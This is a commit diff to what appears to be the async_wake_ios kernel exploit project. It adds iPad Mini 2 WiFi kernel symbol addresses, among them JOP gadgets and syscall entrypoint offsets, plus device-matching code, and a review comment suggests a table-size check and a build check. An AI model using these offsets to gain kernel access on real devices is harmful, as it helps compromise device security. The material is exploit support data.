
Commit c47955b

Added symbols for iPad Mini 2 WiFi (iPad4,4)
Credits to @cji for finding these symbols.
1 parent cdb548b commit c47955b

1 file changed

+26
-0
lines changed


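--- a/async_wake_ios/symbols.c
+++ b/async_wake_ios/symbols.c
@@ -178,6 +178,28 @@ uint64_t ksymbols_iphone_6s_15b202[] = {
 0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
 };
 
+uint64_t ksymbols_ipad_mini_2_wifi_15b202[] = {
+0xFFFFFFF0074947EC, // KSYMBOL_OSARRAY_GET_META_CLASS,
+0xFFFFFFF007523A98, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
+0xFFFFFFF007525240, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
+0xFFFFFFF0073A6F84, // KSYMBOL_CSBLOB_GET_CD_HASH
+0xFFFFFFF0070B8590, // KSYMBOL_KALLOC_EXTERNAL
+0xFFFFFFF0070B85C0, // KSYMBOL_KFREE
+0xFFFFFFF0070B85BC, // KYSMBOL_RET
+0xFFFFFFF0074AE718, // KSYMBOL_OSSERIALIZER_SERIALIZE,
+0xFFFFFFF007549D40, // KSYMBOL_KPRINTF
+0xFFFFFFF0074B96B0, // KSYMBOL_UUID_COPY
+0xFFFFFFF00756E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
+0xFFFFFFF00708818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
+0xFFFFFFF007088164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
+0xFFFFFFF007088434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
+0xFFFFFFF0070883E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
+0xFFFFFFF00719CF44, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
+0xFFFFFFF0073F6094, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
+0xFFFFFFF007198EC0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
+0xfffffff0071998BC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
+};
+
 uint64_t ksym(enum ksymbol sym) {
 if (kernel_base == 0) {
 if (!have_kmem_read()) {
@@ -253,6 +275,10 @@ void offsets_init() {
 printf("this is iPhone 6P, should work!\n");
 symbols = ksymbol_iphone_6p_15b202;
 have_syms = 1;
+} else if (strstr(u.machine, "iPad4,4")) {
+printf("this is iPad Mini 2 WiFi, should work!\n");
+symbols = ksymbols_ipad_mini_2_wifi_15b202;
+have_syms = 1;
 } else {
 printf("no symbols for this device yet\n");
 printf("tfp0 should still work, but the kernel debugger PoC won't\n");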
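Review bot: The new `ksymbols_ipad_mini_2_wifi_15b202` table in the first hunk is indexed positionally by `enum ksymbol` (the `ksym()` lookup follows it), so an entry left out or placed in the wrong slot is not a compile error but a wrong kernel address handed to every later read and write; nothing in the hunk pins the table length to the enum. I would add a size check next to the table, `_Static_assert(sizeof ksymbols_ipad_mini_2_wifi_15b202 / sizeof ksymbols_ipad_mini_2_wifi_15b202[0] == KSYMBOL_COUNT /* placeholder: the enum's terminating count member, if one exists */, "ipad mini 2 table out of sync with enum ksymbol");`, or at least a leading comment `// entry order must match enum ksymbol exactly; ksym() indexes by enum value`, and the same applies to the existing per-device tables. The selection in the second hunk keys only on `u.machine`, while the addresses are for one specific build (the `_15b202` suffix); unless `offsets_init` already gates on the OS version above the hunk (its start is outside this view), a device on another build would be matched and given wrong addresses, so the check should also confirm the build before setting `have_syms = 1`. Minor: the comment `KYSMBOL_RET` is a typo for `KSYMBOL_RET`, and the last entry's lowercase `0xfffffff0071998BC` breaks the uppercase convention used by every other line.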
